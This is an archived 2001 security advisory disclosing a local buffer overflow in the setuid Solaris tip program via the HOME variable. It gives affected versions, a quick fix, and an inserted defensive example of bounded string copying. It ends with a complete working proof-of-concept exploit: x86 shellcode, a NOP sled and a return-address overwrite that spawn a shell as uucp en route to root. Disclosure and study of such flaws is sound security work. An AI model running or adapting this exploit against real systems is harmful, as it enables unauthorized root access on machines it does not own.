From: Pablo Sor (psor@afip.gov.ar)
Date: Tue Mar 27 2001 - 05:54:42 CST


    Vulnerability in Solaris tip(1)

    Date Published: March 27, 2001

    Advisory ID: N/A

    Bugtraq ID: N/A

    CVE CAN: None currently assigned.

    Title: Solaris tip(1) Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    The tip program is installed setuid uucp by default in Solaris. It
    contains a vulnerability in its handling of data taken from environment
    variables: if such a variable exceeds a predefined length, an exploitable
    stack overflow can occur.
    By exploiting this vulnerability an attacker can gain effective uid uucp,
    and through that root.
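    The bug class described above is a fixed-size stack buffer filled from an environment variable with no length check. The following added example is not tip's source and is not part of the original advisory: it places that unsafe pattern beside a bounded copy that rejects oversized input instead of overflowing; the buffer size and function names are illustrative assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOME_BUF 256   /* hypothetical fixed buffer size, chosen for illustration */

/* Unsafe pattern (illustrative, not tip's actual code): an environment
 * variable the caller controls is copied into a fixed stack buffer with
 * no bound, so a value longer than HOME_BUF writes past the buffer and
 * over the saved return address. This is the class of bug in the advisory. */
void vulnerable_use_home(const char *home)
{
    char buf[HOME_BUF];
    strcpy(buf, home);          /* no length check: stack overflow on long input */
    (void)buf;
}

/* Hardened form: copy only if the whole string, including its NUL, fits in
 * dstlen bytes; otherwise refuse rather than truncate or overflow.
 * Returns 0 on success, -1 if home is NULL, empty, or too long. */
int copy_home_checked(const char *home, char *dst, size_t dstlen)
{
    if (home == NULL || dstlen == 0)
        return -1;
    /* memchr bounds the scan, so an unterminated/oversized input is never
     * walked past dstlen bytes */
    const char *end = memchr(home, '\0', dstlen);
    if (end == NULL)            /* no terminator within dstlen: too long */
        return -1;
    size_t n = (size_t)(end - home);
    if (n == 0)                 /* empty value is rejected as well */
        return -1;
    memcpy(dst, home, n + 1);   /* n + 1 <= dstlen is guaranteed above */
    return 0;
}

/* Convenience wrapper that reads HOME from the real environment. */
int home_fits(char *dst, size_t dstlen)
{
    return copy_home_checked(getenv("HOME"), dst, dstlen);
}

int main(void)
{
    char buf[HOME_BUF];
    if (home_fits(buf, sizeof buf) == 0)
        printf("HOME accepted: %s\n", buf);
    else
        fprintf(stderr, "HOME missing, empty or too long; refusing\n");
    return 0;
}
```

    The same check applies to any environment variable a setuid program copies into a fixed buffer; rejecting oversized input is the fix, clearing the setuid bit (the Quick Fix below) only removes the privilege gain.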

    Vulnerable Packages/Systems:

    Solaris 8
    Solaris 7
    Solaris 2.6
    Solaris 2.5.1
    Solaris 2.5

    Quick Fix:

    Clear the suid bit of /usr/bin/tip program.

    Solution/Vendor :

    Sun Microsystems was notified on March 16, 2001. Patches are expected
    shortly.

    Vendor notified on:

    March 16, 2001

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

    Special thanks to Dave Ahmed from SecurityFocus.

    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability Help Team. For more information or assistance drafting
    advisories please mail vulnhelp@securityfocus.com.

    Technical Description - Exploit/Concept Code:

    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /*
       /usr/bin/tip overflow proof of concept.

       Pablo Sor, Buenos Aires, Argentina 03/2001
       psor@afip.gov.ar

       works against x86 solaris 7,8

       default offset should work.

    */

    /* returns the current stack pointer (32-bit x86: value is left in %eax) */
    long get_esp() { __asm__("movl %esp,%eax"); }

    int main(int ac, char **av)
    {

    char shell[]=
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
    "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
    "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"
    "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
    "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
    "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"
    "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

      unsigned long magic = get_esp() + 0x50; /* default offset */
      unsigned char buf[600];

      symlink("/bin/ksh","/tmp/xx");                /* shell the payload executes */
      memset(buf,0x90,600);                         /* fill with NOPs */
      buf[599]=0;
      memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); /* payload at end */
      memcpy(buf,"HOME=",5);                        /* HOME is the overflowed variable */
      memcpy(buf+265,&magic,4);                     /* return address at offset 265 */
      putenv((char *)buf);

      system("/usr/bin/tip 5");
      unlink("/tmp/xx");
      return 0;
    }